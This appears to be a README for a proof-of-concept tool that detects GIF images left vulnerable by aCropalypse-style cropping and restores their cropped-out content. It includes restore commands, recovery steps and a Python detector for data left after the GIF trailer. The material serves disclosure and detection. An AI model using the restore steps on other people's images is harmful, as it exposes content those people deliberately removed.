A GIF proof of concept related to aCropalypse (CVE-2023-21036). The reported aCropalypse vulnerability affects PNG, but a similar exploit exists in GIF images.
This is the original GIF image, case02.gif.

And this is the cropped image, case02_crop.gif, produced with aCropalypse-affected software.
Execute `acropalypse-gif restore`:

```sh
$ acropalypse-gif restore asset/case02_crop.gif 688 634
asset/case02_crop.gif-restored.gif
```
Build with Cargo:

```sh
cargo build --release
```
Detect an aCropalypse-affected GIF image:

```sh
acropalypse-gif detect <filepath>
```

```sh
# undetected
$ acropalypse-gif detect asset/case01.gif

# detected
$ acropalypse-gif detect asset/case01_crop.gif
asset/case01_crop.gif
```
Restore the partial GIF image from an aCropalypse-affected GIF image:

```sh
acropalypse-gif restore <filepath> <width> <height>
```

```sh
# restore case01.gif
$ acropalypse-gif restore asset/case01_crop.gif 619 232
asset/case01_crop.gif-restored.gif
```
Or run it via Docker Compose:

```sh
docker compose run --rm acropalypse-gif detect asset/case01_crop.gif
docker compose run --rm acropalypse-gif restore asset/case01_crop.gif 619 232
```
- Search for the Image Data sub-block. It may start with `0xFF`; verify the GIF Image Data format.
- Search for the 12-bit Clear Code of the LZW compression (GIF). It may be `0b000100000000`.
- Decompress the LZW data after the Clear Code.
- Encode the image using the cropped image's palette.
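The detection side of this, as an added Python illustration that is not part of the acropalypse-gif tool's own Rust code: walk the GIF block structure to the `0x3B` trailer and report how many bytes follow it, since an in-place crop leaves the original image data there. The sample GIF and its leftover bytes are constructed inline; the LZW payload bytes are placeholders and are never decoded.

```python
import struct

GIF_TRAILER, IMAGE_SEPARATOR, EXTENSION_INTRODUCER = 0x3B, 0x2C, 0x21

def color_table_size(packed):
    """Byte length of a colour table described by a packed flags byte (0 if absent)."""
    return 3 * (2 ** ((packed & 0x07) + 1)) if packed & 0x80 else 0

def skip_sub_blocks(data, pos):
    """Skip a chain of data sub-blocks (length byte + payload); return offset past the 0x00 terminator."""
    while pos < len(data):
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size
    raise ValueError("truncated sub-block chain")

def scan_gif(data):
    """Walk the block structure up to the trailer; return (trailer_offset, bytes_after_trailer)."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]                                     # logical screen descriptor flags
    pos = 13 + color_table_size(packed)                   # header + LSD + global colour table
    while pos < len(data):
        block = data[pos]
        if block == GIF_TRAILER:
            return pos, len(data) - pos - 1
        if block == EXTENSION_INTRODUCER:
            pos = skip_sub_blocks(data, pos + 2)          # introducer + label byte
        elif block == IMAGE_SEPARATOR:
            pos += 10 + color_table_size(data[pos + 9])   # image descriptor + local colour table
            pos = skip_sub_blocks(data, pos + 1)          # LZW minimum code size, then image data
        else:
            raise ValueError(f"unknown block 0x{block:02X} at offset {pos}")
    raise ValueError("no trailer found")

def has_trailing_data(data):
    """True when bytes follow the GIF trailer: the aCropalypse-style leftover."""
    return scan_gif(data)[1] > 0

def build_sample_gif():
    """Constructed 2x1 two-colour GIF; the image sub-block bytes are placeholders."""
    header = b"GIF89a" + struct.pack("<HHBBB", 2, 1, 0x80, 0, 0)
    palette = bytes([0, 0, 0, 255, 255, 255])
    descriptor = b"\x2C" + struct.pack("<HHHHB", 0, 0, 2, 1, 0)
    image_data = b"\x02" + b"\x02\x44\x01" + b"\x00"
    return header + palette + descriptor + image_data + bytes([GIF_TRAILER])

CLEAN_GIF = build_sample_gif()
# Constructed leftover: a 0xFF-length sub-block fragment and a second trailer, as an in-place crop may leave.
CROPPED_GIF = CLEAN_GIF + b"\xFF" + bytes(range(32)) + b"\x00\x3B"
```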